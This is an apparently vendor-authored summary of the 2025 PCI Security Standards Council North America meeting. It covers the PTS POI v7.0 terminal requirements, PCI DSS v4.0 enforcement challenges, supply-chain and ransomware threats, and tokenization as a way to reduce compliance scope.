Evolving Payment Security: Insights from the 2025 PCI Security Standards Council Meeting 

The 2025 PCI Security Standards Council (PCI SSC) North America Community Meeting in Fort Worth, Texas, marked a transition from years of planning around PCI DSS v4.0 and v4.0.1 to immediate operational challenges, security enforcement, cryptographic modernization, and governance of emerging technologies. Discussions centered on persistent implementation struggles and a broader evolution from checklist compliance toward continuous, risk-based security management.

Modernizing payment terminal and transaction standards

A key focus was modernizing standards for the physical payment ecosystem as device innovation and cryptographic threats accelerate. The release of PCI PTS POI Modular Security Requirements v7.0 introduced major technical and design changes for manufacturers, signaling a full break from legacy protocols.

Cryptographic acceleration and obsolescence

Version 7.0 mandates 128-bit or stronger cryptography for all terminal security functions, including firmware authentication and tamper detection. The use of any TDES (Triple DES) keys is now prohibited. This accelerates cryptographic deprecation across the POI market, requiring redesigns that support AES and other modern algorithms. Although PCI extended the expiration of POI v5 devices earlier in 2025, that relief does not alter the long-term move toward robust cryptographic standards.

Biometrics and cardholder verification

V7.0 introduces formal evaluation requirements for biometric readers used for Cardholder Verification Method (CVM). Controls now mandate secure capture and processing of biometric data, enabling the next generation of frictionless authentication while maintaining strict privacy and integrity protections.

Controlling functionality creep in smart terminals

The standard also addresses risks posed by multifunction smart terminals that support non-payment applications. PTS POI v7.0 allows the integration of third-party apps (loyalty programs or advertising) only under strict isolation requirements. These rules ensure that non-payment apps cannot access payment input channels or plaintext data, reducing supply chain and malware risks across device ecosystems.

PCI DSS v4.0: Industry struggles and compliance shifts

The March 2025 enforcement of future-dated PCI DSS v4.0 requirements has proven challenging. Survey data presented at the meeting showed that 64% of organizations cite rising complexity, particularly around documentation, MFA, and encryption, as major hurdles, with just 32% feeling fully ready.

Six months into enforcement, the Council’s discussions focused on closing widening compliance gaps and transitioning organizations from “best practice” to fully auditable compliance across four major control areas:

• Expanded multi-factor authentication (MFA): MFA now applies to all access into the Cardholder Data Environment (CDE), not just administrative users. This expansion includes vendors and contractors, increasing implementation complexity and cost.
• Automated logging and review: Manual log reviews are no longer permitted; daily automated monitoring is mandatory, driving widespread adoption of SIEM systems for correlation and alerting.
• Proactive phishing defense: Organizations must detect and prevent advanced phishing attacks targeting system-access personnel.
• Account hygiene: Biannual reviews of all user accounts and privileges are now required.

Confusion around requirements 6.4.3 and 11.6.1

Persistent confusion continues around two complex new requirements, 6.4.3 and 11.6.1, both of which apply even to SAQ-A merchants traditionally considered low risk.

• Requirement 11.6.1 – Web skimming prevention:
  Entities must continuously monitor payment pages for unauthorized changes indicating potential skimming or Magecart-style attacks. This is more difficult for smaller merchants lacing internal security infrastructure.
• Requirement 6.4.3 – Custom software security:
  Organizations must maintain inventories, secure development practices, and vulnerability management for all custom software. Scaling these Secure SDLC practices is difficult for small organizations or those using legacy code, highlighting the widening gap between enterprise and SMB capabilities.

Escalating threats: Supply chain and ransomware

The meeting’s threat intelligence sessions underscored the rise of ransomware-as-a-service and supply chain compromises. Attackers increasingly target third-party providers to propagate ransomware through legitimate updates, APIs, or software libraries.

Organizations must shift toward continuous monitoring of suppliers, require Software Bills of Materials (SBOMs), and maintain evidence of active control validation. Incident response planning must now explicitly address vendor compromise and cyber extortion scenarios. The Council emphasized defining a Minimum Viable Business recovery state, identifying critical assets, and conducting tabletop exercises simulating third-party and ransomware incidents to test decision-making structures under pressure.

Cloud security, APIs, and scope reduction

Extensive sessions focused on PCI DSS v4.0 implementation in cloud and API-driven environments. As payment ecosystems become modular and distributed, scope reduction has emerged as the most pragmatic compliance strategy.

Tokenization and P2PE

Tokenization remains the leading scope-reduction method (used by 74% of organizations). Similarly, Point-to-Point Encryption (P2PE) secures card data immediately upon capture, minimizing PCI DSS scope and risk exposure.

Architectural decoupling as a compliance strategy

The challenges of implementing controls like 6.4.3 and 11.6.1 validate the strategy of removing sensitive data from the environment altogether. Tokenization and validated P2PE allow organizations to focus investment on a smaller, more defensible footprint.

Key strategic themes and takeaways

1. Risk-based evolution: PCI DSS 4.0 shifts from periodic audits to continuous risk management.
2. Device security modernization: POI v7.0 deprecates TDES, enforces AES, and secures biometrics.
3. Operational maturity: Automation and MFA for all access, and documented account reviews illustrate the growing expectation of operational discipline rather than a compliance checkbox.
4. Merchant burden awareness: PCI recognizes the challenges faced by smaller merchants and indicated potential guidance to simplify implementation for those deemed “low risk”.
5. Third-party governance: Continuous monitoring and SBOMs are key to supply chain defense.
6. Scope reduction as strategy: Tokenization and encryption remain the most efficient compliance tools.

The future of payment security

The central message from the 2025 PCI SSC meeting is clear: the future of payment security lies in continuous, risk-based compliance. PCI DSS adherence can no longer be an annual checkbox exercise, it must be an ongoing, intelligence-driven process integrated into every layer of the payment ecosystem.

To learn how our team can help you build a strong PCI DSS strategy, visit our compliance resources.